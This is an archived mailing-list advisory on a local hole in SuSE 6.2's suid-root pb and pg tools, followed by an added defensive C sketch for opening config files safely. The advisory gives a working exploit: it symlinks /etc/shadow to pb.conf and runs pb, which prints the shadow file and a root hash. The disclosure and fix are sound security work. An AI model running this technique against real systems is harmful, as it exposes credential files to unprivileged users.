Greetings,

/usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow any user to read any file on the system as shown:

susebox:/root # ls -la /usr/bin/pb uname
-rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb
susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX) = 0
getpid() = 16623
brk(0) = 0x805032c
brk(0x80504cc) = 0x80504cc
brk(0x8051000) = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such file or directory
) = 41
_exit(1) = ?
susebox:/root #

---

xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec@susebox:/tmp > pb
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> = <bin:*:8902:0:10000::::>
Unknown config line : <daemon:*:8902:0:10000::::> = <lp:*:9473:0:10000::::>
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file

The same scenario for /usr/bin/pg's pg.conf in your cwd.

These two programs also contain numerous buffer overflows and other insecure file i/o and should obviously lose their suid bits. They cannot operate correctly without their s-bits unless they are run by root, but no one besides root will run them anyway. These programs are not worth patching.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
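Added example (not part of the original post and not code from pb, pg or SuSE): a C sketch of how a privileged program can open its configuration file so that the cwd-relative open("pb.conf", O_RDONLY) seen in the strace output, and the symlink that exploits it, are both refused. The names open_trusted_config and demo_results are hypothetical, and the check assumes the config lives at an absolute path whose parent directories only the trusted owner can write.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open a config file for a privileged program.
 * Refuses cwd-relative paths, a symlink as the final path component
 * (O_NOFOLLOW does not check earlier components), non-regular files,
 * and files not owned by `owner` or writable by group/other. */
int open_trusted_config(const char *path, uid_t owner)
{
    struct stat st;
    int fd;

    if (!path || path[0] != '/') { errno = EINVAL; return -1; }
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0) return -1;                 /* ELOOP when path is a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd); errno = EPERM; return -1;
    }
    return fd;
}

/* Constructed demo: bit 1 = regular file accepted, bit 2 = symlink
 * accepted, bit 4 = relative name accepted. Only bit 1 should be set. */
int demo_results(void)
{
    char dir[] = "/tmp/cfgdemoXXXXXX", real[64], link[64];
    int fd, r = 0;
    if (!mkdtemp(dir)) return -1;
    snprintf(real, sizeof real, "%s/real.conf", dir);
    snprintf(link, sizeof link, "%s/pb.conf", dir);
    fd = open(real, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return -1;
    close(fd);
    if (symlink(real, link) != 0) return -1;
    if ((fd = open_trusted_config(real, geteuid())) >= 0) { r |= 1; close(fd); }
    if ((fd = open_trusted_config(link, geteuid())) >= 0) { r |= 2; close(fd); }
    if ((fd = open_trusted_config("pb.conf", geteuid())) >= 0) { r |= 4; close(fd); }
    unlink(link); unlink(real); rmdir(dir);
    return r;
}

int main(void) { printf("accepted mask: %d\n", demo_results()); return 0; }
```

A parser built on this should also avoid echoing unrecognised lines back to the caller, since the "Unknown config line" messages are what disclosed the file contents in the session above.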
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:04:22 PDT